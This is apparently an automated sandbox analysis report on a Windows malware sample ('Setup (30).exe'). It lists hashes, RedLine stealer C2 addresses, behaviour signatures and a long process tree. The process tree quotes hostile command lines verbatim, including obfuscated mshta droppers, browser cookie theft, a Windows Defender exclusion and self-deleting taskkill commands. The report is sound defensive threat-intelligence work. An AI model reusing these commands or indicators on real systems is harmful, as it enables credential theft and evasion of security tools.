Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    374s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 20:54

General

  • Target

    Setup (30).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 21 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 46 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 18 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 25 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1076
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1236
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1956
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2808
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2796
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
              • Suspicious use of SetThreadContext
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              PID:2720
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:5036
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2556
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2544
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1420
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1244
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      • Drops file in Windows directory
                      PID:396
                      • C:\ProgramData\ncosk\nckkpl.exe
                        C:\ProgramData\ncosk\nckkpl.exe start
                        2⤵
                          PID:6452
                        • C:\Users\Admin\AppData\Roaming\rwtdiub
                          C:\Users\Admin\AppData\Roaming\rwtdiub
                          2⤵
                            PID:9348
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:336
                          • C:\Users\Admin\AppData\Local\Temp\Setup (30).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (30).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:764
                            • C:\Users\Admin\Documents\Rz5D2l_bghCsOkZgWBTpHsdF.exe
                              "C:\Users\Admin\Documents\Rz5D2l_bghCsOkZgWBTpHsdF.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4028
                            • C:\Users\Admin\Documents\8a9BDsp2bxtzATYPijov8_xH.exe
                              "C:\Users\Admin\Documents\8a9BDsp2bxtzATYPijov8_xH.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3412
                              • C:\Users\Admin\Documents\8a9BDsp2bxtzATYPijov8_xH.exe
                                "C:\Users\Admin\Documents\8a9BDsp2bxtzATYPijov8_xH.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4364
                              • C:\Users\Admin\Documents\8a9BDsp2bxtzATYPijov8_xH.exe
                                "C:\Users\Admin\Documents\8a9BDsp2bxtzATYPijov8_xH.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4968
                              • C:\Users\Admin\Documents\8a9BDsp2bxtzATYPijov8_xH.exe
                                "C:\Users\Admin\Documents\8a9BDsp2bxtzATYPijov8_xH.exe"
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious use of AdjustPrivilegeToken
                                PID:680
                            • C:\Users\Admin\Documents\2rptUA4LiBqMCG32oj6RxPiG.exe
                              "C:\Users\Admin\Documents\2rptUA4LiBqMCG32oj6RxPiG.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2924
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 480
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:6100
                            • C:\Users\Admin\Documents\1Ycts4UDQN94tJuleULmDYdG.exe
                              "C:\Users\Admin\Documents\1Ycts4UDQN94tJuleULmDYdG.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3932
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7152420690.exe"
                                3⤵
                                  PID:4876
                                  • C:\Users\Admin\AppData\Local\Temp\7152420690.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7152420690.exe"
                                    4⤵
                                    • Drops file in Windows directory
                                    PID:1216
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7249023011.exe"
                                  3⤵
                                    PID:6896
                                    • C:\Users\Admin\AppData\Local\Temp\7249023011.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7249023011.exe"
                                      4⤵
                                        PID:5916
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 756
                                          5⤵
                                          • Program crash
                                          PID:8932
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 868
                                          5⤵
                                          • Program crash
                                          PID:8832
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "1Ycts4UDQN94tJuleULmDYdG.exe" /f & erase "C:\Users\Admin\Documents\1Ycts4UDQN94tJuleULmDYdG.exe" & exit
                                      3⤵
                                        PID:7060
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im "1Ycts4UDQN94tJuleULmDYdG.exe" /f
                                          4⤵
                                          • Kills process with taskkill
                                          PID:7068
                                    • C:\Users\Admin\Documents\GFYPnQX5N4yaDmcjSIAy8d9r.exe
                                      "C:\Users\Admin\Documents\GFYPnQX5N4yaDmcjSIAy8d9r.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3820
                                    • C:\Users\Admin\Documents\ANibdg18Pp7uTGVYm5ho9gWo.exe
                                      "C:\Users\Admin\Documents\ANibdg18Pp7uTGVYm5ho9gWo.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:2580
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 660
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4516
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 644
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3856
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 680
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4196
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 668
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4216
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 1068
                                        3⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4252
                                    • C:\Users\Admin\Documents\QYOV70ONFxC6Bj36kJ8tk635.exe
                                      "C:\Users\Admin\Documents\QYOV70ONFxC6Bj36kJ8tk635.exe"
                                      2⤵
                                        PID:204
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\QYOV70ONFxC6Bj36kJ8tk635.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\QYOV70ONFxC6Bj36kJ8tk635.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                          3⤵
                                            PID:4492
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\QYOV70ONFxC6Bj36kJ8tk635.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\QYOV70ONFxC6Bj36kJ8tk635.exe" ) do taskkill -IM "%~nXW" -f
                                              4⤵
                                                PID:4512
                                                • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                  WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:2268
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                    6⤵
                                                      PID:5084
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                        7⤵
                                                          PID:4340
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                        6⤵
                                                        • Loads dropped DLL
                                                        PID:5632
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill -IM "QYOV70ONFxC6Bj36kJ8tk635.exe" -f
                                                      5⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4248
                                              • C:\Users\Admin\Documents\qGOyvlnk7mzeU8IwmPgKu3oM.exe
                                                "C:\Users\Admin\Documents\qGOyvlnk7mzeU8IwmPgKu3oM.exe"
                                                2⤵
                                                  PID:680
                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Drops startup file
                                                    PID:4424
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:2208
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:4072
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:4112
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:3764
                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                      4⤵
                                                        PID:4568
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        4⤵
                                                          PID:6012
                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:5420
                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:5140
                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:4540
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:4400
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                            PID:5336
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                              PID:10884
                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            • Drops file in Program Files directory
                                                            PID:4480
                                                        • C:\Users\Admin\Documents\F3JxUDCeJTE6omRMqOS9yoMT.exe
                                                          "C:\Users\Admin\Documents\F3JxUDCeJTE6omRMqOS9yoMT.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:368
                                                        • C:\Users\Admin\Documents\kT2a5RO8VIa70Nf9tisxcXLU.exe
                                                          "C:\Users\Admin\Documents\kT2a5RO8VIa70Nf9tisxcXLU.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:2396
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\KT2A5R~1.DLL,s C:\Users\Admin\DOCUME~1\KT2A5R~1.EXE
                                                            3⤵
                                                              PID:7876
                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\KT2A5R~1.DLL,KR8KbkFVVQ==
                                                                4⤵
                                                                  PID:9052
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\KT2A5R~1.DLL
                                                                    5⤵
                                                                      PID:8988
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        6⤵
                                                                        • Loads dropped DLL
                                                                        PID:7876
                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\KT2A5R~1.DLL,ex1dcUJGT3J1
                                                                      5⤵
                                                                        PID:6224
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                                                          6⤵
                                                                            PID:4668
                                                                            • C:\Windows\system32\ctfmon.exe
                                                                              ctfmon.exe
                                                                              7⤵
                                                                                PID:5224
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp9DBF.tmp.ps1"
                                                                            5⤵
                                                                              PID:8564
                                                                      • C:\Users\Admin\Documents\pMPJ0qJK7ldbbDGcqGnR5byf.exe
                                                                        "C:\Users\Admin\Documents\pMPJ0qJK7ldbbDGcqGnR5byf.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1832
                                                                      • C:\Users\Admin\Documents\iEeAVUPs9DKxMXV6fb9db26l.exe
                                                                        "C:\Users\Admin\Documents\iEeAVUPs9DKxMXV6fb9db26l.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3176
                                                                      • C:\Users\Admin\Documents\HjNyG8BTMRW9lzIR5CTHlgwM.exe
                                                                        "C:\Users\Admin\Documents\HjNyG8BTMRW9lzIR5CTHlgwM.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:3948
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 388
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Program crash
                                                                          PID:4188
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 420
                                                                          3⤵
                                                                          • Program crash
                                                                          PID:1216
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 420
                                                                          3⤵
                                                                          • Program crash
                                                                          PID:1008
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 628
                                                                          3⤵
                                                                          • Program crash
                                                                          PID:4904
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 688
                                                                          3⤵
                                                                          • Program crash
                                                                          PID:6344
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 572
                                                                          3⤵
                                                                          • Program crash
                                                                          PID:6784
                                                                        • C:\Users\Admin\Documents\HjNyG8BTMRW9lzIR5CTHlgwM.exe
                                                                          "C:\Users\Admin\Documents\HjNyG8BTMRW9lzIR5CTHlgwM.exe"
                                                                          3⤵
                                                                            PID:10920
                                                                        • C:\Users\Admin\Documents\otnZJRDye4z2WsreHn0i8777.exe
                                                                          "C:\Users\Admin\Documents\otnZJRDye4z2WsreHn0i8777.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2860
                                                                        • C:\Users\Admin\Documents\ty3MUadERPS9TG5NFHgET3Ru.exe
                                                                          "C:\Users\Admin\Documents\ty3MUadERPS9TG5NFHgET3Ru.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:2300
                                                                        • C:\Users\Admin\Documents\cAmpYy4mcEbgE__5u_rTGDpz.exe
                                                                          "C:\Users\Admin\Documents\cAmpYy4mcEbgE__5u_rTGDpz.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:196
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "cAmpYy4mcEbgE__5u_rTGDpz.exe" /f & erase "C:\Users\Admin\Documents\cAmpYy4mcEbgE__5u_rTGDpz.exe" & exit
                                                                            3⤵
                                                                              PID:6556
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im "cAmpYy4mcEbgE__5u_rTGDpz.exe" /f
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:8108
                                                                          • C:\Users\Admin\Documents\0o7ZYobgBdGEhe7RW6ExGdVX.exe
                                                                            "C:\Users\Admin\Documents\0o7ZYobgBdGEhe7RW6ExGdVX.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:1104
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 760
                                                                              3⤵
                                                                              • Program crash
                                                                              PID:4848
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 812
                                                                              3⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5248
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 792
                                                                              3⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5168
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 824
                                                                              3⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5880
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 956
                                                                              3⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4928
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 988
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Program crash
                                                                              PID:204
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 1016
                                                                              3⤵
                                                                              • Program crash
                                                                              PID:3460
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 1364
                                                                              3⤵
                                                                              • Program crash
                                                                              PID:6536
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 1416
                                                                              3⤵
                                                                              • Program crash
                                                                              PID:6732
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 1512
                                                                              3⤵
                                                                              • Program crash
                                                                              PID:6756
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 1344
                                                                              3⤵
                                                                              • Program crash
                                                                              PID:7856
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 1588
                                                                              3⤵
                                                                              • Program crash
                                                                              PID:5688
